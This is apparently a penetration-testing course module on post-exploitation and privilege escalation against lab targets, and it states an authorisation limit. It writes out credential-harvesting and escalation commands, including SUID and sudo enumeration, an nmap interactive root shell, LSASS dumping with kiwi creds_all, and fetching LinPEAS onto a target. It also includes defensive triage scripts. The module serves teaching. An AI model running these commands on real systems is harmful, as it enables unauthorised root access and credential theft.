
Week 9: Post-Exploitation and Privilege Escalation


Weidman writes: "Some say pentests truly begin only after exploitation, in the post-exploitation phase. You got in, but what does that intrusion really mean to the client?" A shell as a low-privilege service account is a finding. A shell as root or SYSTEM on a domain controller is a different finding entirely. This week bridges those two.


Reading (~1.5 hr)

Required:

  • Weidman, Penetration Testing, Chapter 13 ("Post Exploitation"), sections on local privilege escalation (getsystem, local escalation modules, UAC bypass), local information gathering, and lateral movement (covered more in Week 10). ~40 pages.
  • HP3, Chapter 4 ("The Drive -- Compromising the Network"), the privilege escalation sections (Linux and Windows). Peter Kim's red-team approach supplements Weidman with more current techniques (credential manager, LSASS memory, BloodHound/SharpHound for AD paths).

Supplementary:

  • GTFOBins (gtfobins.github.io) -- Reference for Unix binary privilege escalation techniques. Used in Linux privesc enumeration.
  • LOLBAS (lolbas-project.github.io) -- Reference for Windows "living off the land" privilege escalation techniques.

Lecture outline (~1 hr)

Part 1: What post-exploitation means (15 min)

Post-exploitation is everything after the initial foothold. It answers: what is the actual business impact of the compromise?

The post-exploitation phase covers:

  • Local privilege escalation: Elevate from the initial shell's privilege level to root (Linux) or SYSTEM (Windows)
  • Credential capture: Extract hashes, plaintext credentials, tokens, API keys from the compromised host
  • Local information gathering: Map the host's network interfaces, running processes, installed software, scheduled tasks, recent files
  • Persistence (optional for this course): Establish a mechanism to regain access; used in red-team engagements; requires explicit ROE authorization in professional work
  • Lateral movement (Week 10): Use the compromised host as a pivot to reach other systems on the network

The first post-exploitation question on every host: what privilege level is the initial shell running at?

# Linux:
id && whoami && hostname && uname -a
# Windows (Meterpreter):
sysinfo
getuid
getsystem  # attempt automatic privilege escalation

Part 2: Linux privilege escalation (25 min)

Linux privesc works by finding a path from the current user's capabilities to root. LinPEAS automates the enumeration; you must understand what each category means to prioritize the output.

Common Linux privesc technique families:

  • SUID binaries
      What to look for: Binaries with the SUID bit set run as the file owner (often root) regardless of who launches them. If the binary is in GTFOBins, there is a known privesc path.
      Tool: find / -perm -4000 -type f 2>/dev/null
  • Sudo misconfigurations
      What to look for: sudo -l shows what the current user can run as root. If a binary is listed without a password requirement and is in GTFOBins, escalation is straightforward.
      Tool: sudo -l
  • Writable cron jobs
      What to look for: Cron jobs running as root that reference writable scripts or directories.
      Tool: cat /etc/crontab; ls -la /etc/cron.*
  • World-writable service configs
      What to look for: Service configuration files writable by the current user that are executed at elevated privilege.
      Tool: LinPEAS output
  • Outdated kernel (DirtyCow, etc.)
      What to look for: Kernel exploits provide a reliable path but crash the system on failure. Use as a last resort on production; lab use is appropriate.
      Tool: uname -r + CVE search
  • Password reuse / .bash_history
      What to look for: Credentials in shell history, config files, scripts.
      Tool: cat ~/.bash_history; grep -r 'password' /home/ 2>/dev/null

LinPEAS workflow:

# Transfer LinPEAS to target:
# On Kali: python3 -m http.server 8080
# On target: wget http://<kali-ip>:8080/linpeas.sh && chmod +x linpeas.sh

# Run LinPEAS:
./linpeas.sh | tee linpeas-output.txt

# Read output:
# High-severity findings are highlighted in RED
# Medium-severity in YELLOW
# Check each category: SUID, sudo, cron, network, users, passwords

The Lab 9 deliverable requires you to annotate each LinPEAS finding with the technique family it belongs to and a one-sentence explanation of the escalation path. Do not paste raw LinPEAS output into a client report.
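An added example (not from the course materials or from LinPEAS) of the annotation work the deliverable asks for: a triage helper that classifies enumeration output into the technique families in the table above and rates confidence. The find/sudo/crontab output, the KNOWN_ESCALATORS set (a stand-in for the GTFOBins index) and the WORLD_WRITABLE set are all constructed for the example.

```python
import re

# Constructed enumeration output (not captured from a real host), in the shape
# of `find / -perm -4000 -type f`, `sudo -l` and `cat /etc/crontab` results.
SUID_OUT = "/usr/bin/nmap\n/usr/bin/passwd\n/usr/bin/find\n/bin/su\n"
SUDO_OUT = """User msfadmin may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/python
    (root) /usr/bin/vim
    (root) /usr/sbin/service
"""
CRON_OUT = """17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root /opt/backup/backup.sh
"""
# Constructed stand-in for the GTFOBins index (binaries with a documented
# SUID/sudo entry). A real audit would load the actual index.
KNOWN_ESCALATORS = {"nmap", "find", "python", "vim", "bash", "less"}
# Paths a separate `ls -la` check reported as world-writable (constructed).
WORLD_WRITABLE = {"/opt/backup/backup.sh"}

RANK = {"high": 0, "medium": 1, "low": 2}

def basename(path):
    return path.rsplit("/", 1)[-1]

def triage(suid_out, sudo_out, cron_out):
    """Return (family, path, confidence, explanation) tuples, highest confidence first."""
    findings = []
    # SUID family: only binaries with a documented entry are flagged;
    # passwd and su are SUID by design and stay out of the report.
    for path in suid_out.split():
        if basename(path) in KNOWN_ESCALATORS:
            findings.append(("SUID", path, "high",
                             f"{basename(path)} runs as root for any user and is in the index"))
    # sudo family: NOPASSWD entries need no credential, so they rate higher.
    for m in re.finditer(r"\(([^)]+)\)\s+(NOPASSWD:\s+)?(\S+)", sudo_out):
        _runas, nopasswd, path = m.groups()
        if basename(path) in KNOWN_ESCALATORS:
            findings.append(("sudo", path, "high" if nopasswd else "medium",
                             f"{basename(path)} runnable as root via sudo"
                             + (" without a password" if nopasswd else " (password required)")))
    # cron family: a root job that executes a script the current user can modify.
    for line in cron_out.splitlines():
        fields = line.split()
        if len(fields) >= 7 and fields[5] == "root":
            for token in fields[6:]:
                if token in WORLD_WRITABLE:
                    findings.append(("cron", token, "high",
                                     "root cron job executes a world-writable script"))
    return sorted(findings, key=lambda f: RANK[f[2]])
```

Each tuple maps directly onto the deliverable's three required fields (technique family, one-sentence path, confidence), so the report never needs raw LinPEAS text.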

Part 3: Windows privilege escalation (20 min)

Windows privesc techniques differ from Linux but follow the same logic: find a path from the current user to SYSTEM.

Common Windows privesc technique families:

  • Unquoted service path
      What to look for: Service binaries specified without quotes and with spaces in the path. Windows may execute a binary planted in an intermediate directory.
      Tool: wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
  • Writable service binary
      What to look for: Current user can overwrite the service binary and the service runs as SYSTEM or a high-privilege account.
      Tool: WinPEAS output; icacls <service_binary>
  • DLL hijacking
      What to look for: Application loads a DLL from a user-writable directory. Planting a malicious DLL with the same name causes it to load with the app's privilege.
      Tool: WinPEAS output; Procmon on the target
  • AlwaysInstallElevated
      What to look for: Registry keys that allow MSI packages to install with elevated privilege.
      Tool: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  • Token impersonation
      What to look for: On older Windows builds, a user with SeImpersonatePrivilege (often service accounts) can escalate via token impersonation exploits (Juicy Potato, PrintSpoofer).
      Tool: whoami /priv; check for SeImpersonatePrivilege
  • Credential extraction (Mimikatz / kiwi)
      What to look for: Windows stores credentials in LSASS memory. On Windows <= 2012 R2 without WDigest disabled, plaintext passwords are available.
      Tool: Meterpreter: load kiwi; creds_all
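An added example (not from the course or from WinPEAS) of the unquoted-service-path check, written as a hardening audit over wmic output: it reproduces the lookup sequence Windows follows when an unquoted image path contains spaces and lists the directories whose ACLs an administrator must verify are not writable by standard users. The wmic sample and service names are constructed.

```python
import re

# Constructed sample in the shape of `wmic service get name,displayname,pathname,startmode`
# output (not captured from a real host); columns are separated by two or more spaces.
WMIC_OUT = r"""Name        DisplayName         PathName                                                StartMode
Spooler     Print Spooler       C:\Windows\System32\spoolsv.exe                         Auto
VulnSvc     Vulnerable Service  C:\Program Files\Vendor App\bin\service.exe -k netsvcs  Auto
QuotedSvc   Quoted Service      "C:\Program Files\Other App\svc.exe" -run               Auto
NoSpaceSvc  No Space Service    C:\Tools\agent.exe                                      Manual
"""

def image_path(pathname):
    """Return (executable path, quoted?). A quoted path is unambiguous; an
    unquoted one is taken to end at the first token ending in .exe."""
    if pathname.startswith('"'):
        return pathname[1:pathname.index('"', 1)], True
    m = re.match(r"(.*?\.exe)\b", pathname, re.IGNORECASE)
    return (m.group(1) if m else pathname), False

def search_candidates(exe_path):
    """Paths Windows tries, in order, before the intended one: the unquoted
    command line is cut at each space and '.exe' appended."""
    tokens = exe_path.split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]

def audit(wmic_out):
    """Flag services whose unquoted image path contains spaces, together with
    the directories that must not be writable by standard users."""
    findings = []
    for line in wmic_out.strip().splitlines()[1:]:   # skip the header row
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) != 4:
            continue
        name, _display, pathname, startmode = cols
        exe, quoted = image_path(pathname)
        if quoted or " " not in exe:
            continue                                  # quoted or space-free: not affected
        check_dirs = sorted({c.rsplit("\\", 1)[0] + "\\" for c in search_candidates(exe)})
        findings.append({"service": name, "startmode": startmode,
                         "image": exe, "check_dirs": check_dirs})
    return findings

if __name__ == "__main__":
    for f in audit(WMIC_OUT):
        print(f"{f['service']} ({f['startmode']}): {f['image']}")
        for d in f["check_dirs"]:
            print("  verify ACL on", d)
```

The fix on the defender's side is the one the table implies: quote the ImagePath in the service configuration, then confirm that none of the listed directories grants write access to standard users.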

WinPEAS workflow:

# From a Meterpreter session on Metasploitable Windows target:
meterpreter > upload winpeas.exe C:\\Windows\\Temp\\winpeas.exe
# The Meterpreter console has no local pipe, so redirect on the target and pull the file back:
meterpreter > execute -f cmd.exe -a "/c C:\\Windows\\Temp\\winpeas.exe -ansi > C:\\Windows\\Temp\\winpeas-output.txt"
meterpreter > download C:\\Windows\\Temp\\winpeas-output.txt

Or run directly in a Windows shell:

winpeas.exe > winpeas-output.txt
type winpeas-output.txt

Meterpreter's getsystem shortcut:

meterpreter > getsystem

getsystem tries multiple techniques automatically (token impersonation, named pipe impersonation, reflective DLL injection). It is a useful first step in the lab; understanding what it tries matters more than whether it succeeds.


Lab 9: Privilege Escalation (~5 hr, graded)

See labs/lab-9-privesc.md for the full lab.

Targets: Metasploitable 2 (Linux privesc exercises) + lab Windows VM (Windows privesc exercises; instructor-provided).

Authorization note: All targets are the authorized lab range. Do not apply privesc techniques to any other system.

Linux privesc exercises (Metasploitable 2):

  1. Obtain an initial low-privilege shell (use any technique from Week 7 or a new one; document the initial foothold).
  2. Transfer and run LinPEAS. Save the full output.
  3. Identify at least two distinct privesc paths in the LinPEAS output. For each: name the technique family (SUID, sudo, cron, etc.), explain the escalation path in one sentence, and rate your confidence that it works.
  4. Execute one privesc path to achieve root. Screenshot: id showing uid=0(root).
  5. Annotate the LinPEAS finding that led to the successful escalation: what did LinPEAS flag, and what did the flag mean?

Windows privesc exercises (lab Windows VM):

  1. Obtain an initial shell with low privileges (instructor provides initial access credentials for a low-privilege user account).
  2. Transfer and run WinPEAS. Save the output.
  3. Identify at least two distinct privesc paths in the WinPEAS output. Annotate each with the technique family.
  4. Execute one privesc path to achieve SYSTEM. Screenshot: whoami showing nt authority\system.
  5. If a Meterpreter session is available, run load kiwi; creds_all and document what credential material is accessible from a SYSTEM-level session.

Deliverable: Lab report with two sections (Linux and Windows). Each section: initial foothold description, LinPEAS / WinPEAS summary (annotated, not raw), the successful escalation steps, proof screenshot, and one paragraph on the business impact of achieving root/SYSTEM on this host.


Independent practice (~3 hr)

  • GTFOBins exercise (1 hr): Pick three binaries that appear in typical Metasploitable 2 SUID output (nmap, find, python). Look each one up on GTFOBins. Document: the exact command that achieves a shell or file read as root, and explain why the SUID bit makes this work.
  • WinPEAS interpretation (1 hr): Read the WinPEAS output from Lab 9 and identify one additional privesc path you did not exploit. Describe how you would exploit it (step by step) without running the exploit itself.
  • Reflection (1 hr): Write responses to the reflection prompts below.

Reflection prompts

  1. LinPEAS colored Metasploitable 2's nmap binary RED under SUID findings. Look up the GTFOBins entry for nmap. The old interactive mode of nmap (nmap --interactive; !sh) provides a shell as root when nmap has the SUID bit. Why does SUID make this dangerous, and why does nmap ever need SUID in the first place? (What legitimate purpose did it serve that required elevated privileges?)

  2. You have root on Metasploitable 2. Weidman's post-exploitation chapter lists "collecting credentials" as one of the first activities after escalation. What credential material exists on a Linux system at root level that is not available to a non-root user? Name three specific files or locations and explain why each is sensitive.

  3. The getsystem command in Metasploit tries multiple techniques automatically, including named-pipe impersonation and token duplication. A real-world defender can detect getsystem by monitoring for suspicious named pipe creation or token duplication events. What does this imply about the trade-off between automation (getsystem is one command) and stealth (manual techniques are slower but less detectable)? How would the ROE influence your choice on a real engagement?


Toolchain Diary: Week 9 additions

  • LinPEAS -- Linux Privilege Escalation Awesome Script. Enumerates dozens of escalation-path categories in a single run. Read the script before running it; read the output carefully. Source: github.com/carlospolop/PEASS-ng.
  • WinPEAS -- Windows Privilege Escalation Awesome Script. Windows equivalent of LinPEAS. Output is color-coded in a terminal that supports ANSI codes; use -ansi flag on modern Windows.
  • GTFOBins (gtfobins.github.io) -- Reference for Unix binaries with known privilege escalation paths (SUID, sudo, cron). Indexed by binary name; each entry has the exact command.
  • LOLBAS (lolbas-project.github.io) -- Windows equivalent of GTFOBins. "Living off the land" binaries that can be abused without installing attacker tooling.
  • Meterpreter kiwi module -- Mimikatz integrated into Meterpreter. load kiwi; creds_all extracts NTLM hashes, plaintext passwords (if WDigest is enabled), and Kerberos tickets from LSASS memory on Windows.

What's next

Week 10 is lateral movement: using the credentials, sessions, and network access from Week 9 to reach other hosts inside the authorized lab network. Credential reuse, pass-the-hash, pivoting, and scope discipline. The multi-host engagement transcript from Lab 10 is a direct rehearsal for the capstone.